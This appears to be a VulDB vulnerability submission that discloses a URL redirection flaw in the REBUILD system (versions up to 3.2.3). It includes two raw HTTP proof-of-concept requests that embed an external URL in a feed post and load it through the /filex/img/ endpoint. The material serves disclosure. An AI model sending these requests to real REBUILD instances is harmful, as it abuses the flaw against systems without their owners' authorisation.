Enviar #103390: A URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD systeminformación

TítuloA URL redirection vulnerability exists in the/file/img/* * interface of the REBUILD system
DescripciónSuggested description: URL Redirection vulnerability exists in rebuild <=3.2.3 Vulnerability Type: URL Redirection Vendor of Product: https://github.com/getrebuild/rebuild Affected Product Code Base: <=3.2.3 Affected Component: /feeds/post/publish /filex/img/** Attack Type: Remote Request message 1: ``` POST /feeds/post/publish HTTP/1.1 Host: 192.168.0.102:18080 Content-Length: 112 X-AuthToken: Accept: */* X-CsrfToken: X-Requested-With: XMLHttpRequest X-Client: RB/WEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Origin: http://192.168.0.102:18080 Referer: http://192.168.0.102:18080/feeds/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0 Connection: close {"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}} ``` Request message 2: ``` GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1 Host: 192.168.0.102:18080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8 Referer: http://192.168.0.102:18080/feeds/home Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0 Connection: close ```
Fuente⚠️ https://github.com/getrebuild/rebuild/issues/596
Usuario
 Mechoy (UID 41579)
Sumisión2023-03-19 18:19 (hace 3 años)
Moderación2023-03-23 19:46 (4 days later)
EstadoAceptado
Entrada de VulDB223744 [Rebuild hasta 3.2.3 /feeds/post/publish secuencias de comandos en sitios cruzados]
Puntos20

AnteriorVisión De ConjuntoPróximo

Want to know what is going to be exploited?

We predict KEV entries!